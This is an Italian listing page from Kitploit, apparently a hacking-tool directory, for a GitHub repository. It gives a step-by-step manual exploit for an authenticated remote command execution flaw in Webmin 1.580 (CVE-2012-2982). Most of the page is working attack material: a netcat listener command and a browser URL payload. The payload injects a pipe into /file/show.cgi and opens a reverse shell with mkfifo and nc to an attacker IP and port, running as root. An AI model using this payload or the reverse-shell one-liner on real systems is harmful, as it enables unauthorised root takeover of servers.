Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit- — Manuale, exploit non-Metasploit di Remote Code Execution (RCE) autenticato tramite la barra degli URL del browser per Webmin 1.580 (CVE-2012-2982) | Kitploit
Strumenti/GitHubGitHub/marinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubmarinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-

Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit-

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Manuale, exploit non-Metasploit di Remote Code Execution (RCE) autenticato tramite la barra degli URL del browser per Webmin 1.580 (CVE-2012-2982)

Vedi Repository
2 mesi faNon ancora revisionato

Guida all'esecuzione RCE su Webmin 1.580

Riferimento rapido per eseguire un Remote Code Execution (RCE) autenticato su Webmin 1.580 tramite il componente /file/show.cgi.


1. Macchina attaccante (Listener)

Esegui questo comando sulla tua macchina locale per catturare la connessione in arrivo prima di eseguire il payload:

root@kitploit:~
rlwrap nc -lnvp 4444
  1. Payload di sfruttamento del target Incolla il seguente URL direttamente nella barra degli indirizzi del browser (assicurati di aver effettuato l'accesso alla dashboard di Webmin prima):
root@kitploit:~
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Schermata del 2026-05-25 220641

Nota: Ricorda di sostituire <YOUR_ATTACK_IP> con il tuo indirizzo IP locale o tunnel effettivo, ANCHE IP e PORTA del target. Schermata del 2026-05-25 220708

Contesto e Dettagli

  • Vulnerabilità: Sanitizzazione insufficiente delle informazioni sul percorso inline passate alla funzione interna open() di Perl in /file/show.cgi. L'aggiunta del carattere pipe (|) consente l'esecuzione arbitraria di comandi con privilegi di root.
  • Autenticazione: Richiede una sessione attiva. Il browser gestisce automaticamente l'autenticazione inviando i cookie della sessione attiva quando invii il payload dell'URL.
  • Comportamento previsto: Dopo aver premuto Invio, la scheda del browser girerà e sembrerà bloccarsi indefinitamente. Ciò conferma che il thread del server è stato dirottato con successo per mantenere la sessione interattiva della shell.
Scarica lo strumento